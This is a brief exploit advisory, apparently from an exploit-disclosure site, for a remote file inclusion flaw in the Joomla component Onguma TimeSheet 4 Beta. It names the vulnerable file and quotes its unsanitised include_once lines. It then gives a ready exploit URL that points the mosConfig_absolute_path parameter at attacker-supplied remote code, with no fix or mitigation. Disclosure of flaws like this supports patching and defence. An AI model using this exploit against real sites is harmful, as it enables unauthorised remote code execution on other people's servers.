Onguma TimeSheet 4 Beta - RFI


[o] Onguma TimeSheet 4 Beta Remote File Inclusion Vulnerability
Software : com_ongumatimesheet20 version 4 Beta
Download : http://joomlacode.org/gf/project/ongumasa/frs/
Author : NoGe


[o] Vulnerable file
administrator/components/com_ongumatimesheet20/lib/onguma.class.php
include_once($mosConfig_absolute_path.'/includes/patTemplate/patError.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patErrorManager.php');
include_once($mosConfig_absolute_path.'/includes/patTemplate/patTemplate.php');


[o] Exploit
http://localhost/[path]/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=[evilcode]


One Response so far.

  1. Thank you for yet another fantastic report.